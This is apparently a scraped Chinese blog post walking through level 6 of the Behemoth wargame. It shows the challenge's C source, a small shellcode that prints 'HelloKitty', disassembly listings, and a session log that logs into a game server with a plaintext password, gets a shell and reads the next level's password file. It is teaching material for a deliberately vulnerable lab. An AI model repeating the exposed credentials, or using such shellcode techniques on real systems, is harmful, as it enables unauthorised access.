behemoth - 06
来源:互联网 发布:淘宝店铺代销货源 编辑:程序博客网 时间:2024/05/17 10:54
/* behemoth6.c */#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <string.h>int main(int argc, char *argv[]){FILE *fp;char *buf;fp = popen("/behemoth/behemoth6_reader", "r");if (fp == NULL) {puts("Failed to create pipe.");exit(0);}buf = (char *)malloc(10);fread(buf, 10, 1, fp);pclose(fp);if (strcmp(buf, "HelloKitty")) {puts("Incorrect output.");return 0;}puts("Correct.");execl("/bin/sh", "sh", NULL);return 0;}
/* behemoth6_reader.c */#include <stdio.h>#include <stdlib.h>int main(int argc, char *argv[]){FILE *fp;/* 0x20 */int fsize;/* 0x24 */void (*func)(void);/* 0x2c */char *buf;/* 0x28 */int i;/* 0x1c */fp = fopen("shellcode.txt", "r");if (fp == NULL) {puts("Couldn't open shellcode.txt!");return 0;}fseek(fp, 0, SEEK_END);fsize = ftell(fp);rewind(fp);buf = (char *)malloc(fsize);fread(buf, fsize, 1, fp);fclose(fp);i = 0;while (i < fsize) {if (buf[i] == 0x0b) {puts("Write your own shellcode.");exit(1);}i++;}func = (void (*)(void))buf;(*func)();return 0;}
; shellcode.asmBITS 32global _startsection .text_start:push 0x04; writepop eax ; set SYS_WRITE to eaxxor ebx,ebxinc ebxxor esi, esi ; clean esipush esi ; esi is zeropush 0x79747469 ; push 'itty <--'push 0x4b6f6c6c ; push 'lloK <--'push 0x65485555; push 'HeUU <--'mov ecx, espinc ecxinc ecxmov edx,eaxadd edx,eaxinc edxinc edxint 0x80
栈环境
root@today:~# nasm -f elf32 shellcode.asm -g -F stabs -o shellcode.oroot@today:~# ld -o shellcode shellcode.o -groot@today:~# ./shellcode HelloKittySegmentation faultroot@today:~# for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80root@today:~# ssh behemoth6@178.79.134.250behemoth6@178.79.134.250's password: mayiroechebehemoth6@melinda:~$ cd /tmpbehemoth6@melinda:/tmp$ mkdir shui6behemoth6@melinda:/tmp$ cd shui6behemoth6@melinda:/tmp/shui6$ python -c 'print "\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80"' > shellcode.txtbehemoth6@melinda:/tmp/shui6$ /behemoth/behemoth6Segmentation faultCorrect.$ whoamibehemoth7$ cat /etc/behemoth_pass/behemoth7baquoxuafo$ exit
behemoth6.S
┌─────────────────────────────────────────────────────────────────────────────────┐ │0x804857d <main> push %ebp │ │0x804857e <main+1> mov %esp,%ebp │ │0x8048580 <main+3> and $0xfffffff0,%esp │ │0x8048583 <main+6> sub $0x20,%esp │ │0x8048586 <main+9> movl $0x80486f0,0x4(%esp) │ │0x804858e <main+17> movl $0x80486f2,(%esp) │ │0x8048595 <main+24> call 0x80483f0 <popen@plt> │ │0x804859a <main+29> mov %eax,0x18(%esp) │ │0x804859e <main+33> cmpl $0x0,0x18(%esp) │ │0x80485a3 <main+38> jne 0x80485bd <main+64> │ │0x80485a5 <main+40> movl $0x804870d,(%esp) │ │0x80485ac <main+47> call 0x8048420 <puts@plt> │ │0x80485b1 <main+52> movl $0x0,(%esp) │ │0x80485b8 <main+59> call 0x8048440 <exit@plt> │ │0x80485bd <main+64> movl $0xa,(%esp) │ │0x80485c4 <main+71> call 0x8048410 <malloc@plt> │ │0x80485c9 <main+76> mov %eax,0x1c(%esp) │ │0x80485cd <main+80> mov 0x18(%esp),%eax │ │0x80485d1 <main+84> mov %eax,0xc(%esp) │ │0x80485d5 <main+88> movl $0x1,0x8(%esp) │ │0x80485dd <main+96> movl $0xa,0x4(%esp) │ │0x80485e5 <main+104> mov 0x1c(%esp),%eax │ │0x80485e9 <main+108> mov %eax,(%esp) │ │0x80485ec <main+111> call 0x8048400 <fread@plt> │ │0x80485f1 <main+116> mov 0x18(%esp),%eax │ │0x80485f5 <main+120> mov %eax,(%esp) │ │0x80485f8 <main+123> call 0x8048450 <pclose@plt> │ │0x80485fd <main+128> movl $0x8048724,0x4(%esp) │ │0x8048605 <main+136> mov 0x1c(%esp),%eax │ │0x8048609 <main+140> mov %eax,(%esp) │ │0x804860c <main+143> call 0x80483e0 <strcmp@plt> │ │0x8048611 <main+148> test %eax,%eax │ │0x8048613 <main+150> jne 0x804863f <main+194> │ │0x8048615 <main+152> movl $0x804872f,(%esp) │ │0x804861c <main+159> call 0x8048420 <puts@plt> │ │0x8048621 <main+164> movl $0x0,0x8(%esp) │ │0x8048629 <main+172> movl $0x8048738,0x4(%esp) │ │0x8048631 <main+180> movl $0x804873b,(%esp) │ │0x8048638 <main+187> call 0x8048470 <execl@plt> │ │0x804863d <main+192> jmp 0x804864b <main+206> │ │0x804863f <main+194> movl $0x8048743,(%esp) │ │0x8048646 <main+201> call 0x8048420 <puts@plt> │ │0x804864b <main+206> mov $0x0,%eax │ │0x8048650 <main+211> leave │ │0x8048651 <main+212> ret │ └─────────────────────────────────────────────────────────────────────────────────┘
behemoth6_reader.S
┌─────────────────────────────────────────────────────────────────────────────────┐ │0x80485ad <main> push %ebp │ │0x80485ae <main+1> mov %esp,%ebp │ │0x80485b0 <main+3> and $0xfffffff0,%esp │ │0x80485b3 <main+6> sub $0x30,%esp │ │0x80485b6 <main+9> movl $0x8048750,0x4(%esp) │ │0x80485be <main+17> movl $0x8048752,(%esp) │ │0x80485c5 <main+24> call 0x80484a0 <fopen@plt> │ │0x80485ca <main+29> mov %eax,0x20(%esp) │ │0x80485ce <main+33> cmpl $0x0,0x20(%esp) │ │0x80485d3 <main+38> jne 0x80485e6 <main+57> │ │0x80485d5 <main+40> movl $0x8048760,(%esp) │ │0x80485dc <main+47> call 0x8048450 <puts@plt> │ │0x80485e1 <main+52> jmp 0x80486ae <main+257> │ │0x80485e6 <main+57> movl $0x2,0x8(%esp) │ │0x80485ee <main+65> movl $0x0,0x4(%esp) │ │0x80485f6 <main+73> mov 0x20(%esp),%eax │ │0x80485fa <main+77> mov %eax,(%esp) │ │0x80485fd <main+80> call 0x8048420 <fseek@plt> │ │0x8048602 <main+85> mov 0x20(%esp),%eax │ │0x8048606 <main+89> mov %eax,(%esp) │ │0x8048609 <main+92> call 0x8048490 <ftell@plt> │ │0x804860e <main+97> mov %eax,0x24(%esp) │ │0x8048612 <main+101> mov 0x20(%esp),%eax │ │0x8048616 <main+105> mov %eax,(%esp) │ │0x8048619 <main+108> call 0x8048410 <rewind@plt> │ │0x804861e <main+113> mov 0x24(%esp),%eax │ │0x8048622 <main+117> mov %eax,(%esp) │ │0x8048625 <main+120> call 0x8048440 <malloc@plt> │ │0x804862a <main+125> mov %eax,0x28(%esp) │ │0x804862e <main+129> mov 0x24(%esp),%eax │ │0x8048632 <main+133> mov 0x20(%esp),%edx │ │0x8048636 <main+137> mov %edx,0xc(%esp) │ │0x804863a <main+141> movl $0x1,0x8(%esp) │ │0x8048642 <main+149> mov %eax,0x4(%esp) │ │0x8048646 <main+153> mov 0x28(%esp),%eax │ │0x804864a <main+157> mov %eax,(%esp) │ │0x804864d <main+160> call 0x8048430 <fread@plt> │ │0x8048652 <main+165> mov 0x20(%esp),%eax │ │0x8048656 <main+169> mov %eax,(%esp) │ │0x8048659 <main+172> call 0x8048400 <fclose@plt> │ │0x804865e <main+177> movl $0x0,0x1c(%esp) │ │0x8048666 <main+185> jmp 0x8048696 <main+233> │ │0x8048668 <main+187> mov 0x1c(%esp),%edx │ │0x804866c <main+191> mov 0x28(%esp),%eax │ │0x8048670 <main+195> add %edx,%eax │ │0x8048672 <main+197> movzbl (%eax),%eax │ │0x8048675 <main+200> cmp $0xb,%al │ │0x8048677 <main+202> jne 0x8048691 <main+228> │ │0x8048679 <main+204> movl $0x804877d,(%esp) │ │0x8048680 <main+211> call 0x8048450 <puts@plt> │ │0x8048685 <main+216> movl $0x1,(%esp) │ │0x804868c <main+223> call 0x8048470 <exit@plt> │ │0x8048691 <main+228> addl $0x1,0x1c(%esp) │ │0x8048696 <main+233> mov 0x1c(%esp),%eax │ │0x804869a <main+237> cmp 0x24(%esp),%eax │ │0x804869e <main+241> jl 0x8048668 <main+187> │ │0x80486a0 <main+243> mov 0x28(%esp),%eax │ │0x80486a4 <main+247> mov %eax,0x2c(%esp) │ │0x80486a8 <main+251> mov 0x2c(%esp),%eax │ │0x80486ac <main+255> call *%eax │ │0x80486ae <main+257> mov $0x0,%eax │ │0x80486b3 <main+262> leave │ │0x80486b4 <main+263> ret │ └─────────────────────────────────────────────────────────────────────────────────┘
0 0
- behemoth - 06
- behemoth - 00
- behemoth - 01
- behemoth - 02
- behemoth - 03
- behemoth - 04
- behemoth - 05
- behemoth - 07
- 170903 WarGames-Behemoth(0)
- 170903 WarGames-Behemoth(1)
- 170904 WarGames-Behemoth(2)
- 170905 WarGames-Behemoth(3)
- 170906 WarGames-Behemoth(4)
- 170908 WarGames-Behemoth(7)
- 170907 WarGames-Behemoth(5-6)
- 06
- 06
- 06
- MVP模式介绍:
- OkHttp Wiki 笔记
- android内部存储读写文件详解
- SpringMvc定时器自己的配置详细~~~
- fork之源码剖析
- behemoth - 06
- 模板类的继承
- ZOJ 3322Who is Older?(模拟)
- Android studio之配置NDK开发环境
- Java Reflection(三):构造器
- Apache+Tomcat集群配置+session共享
- 表的storage (MINEXTENTS 属性对truncate后表大小的影响
- 视频监控大数据的关键技术和应用(来自中国安防)
- C++基础::便捷函数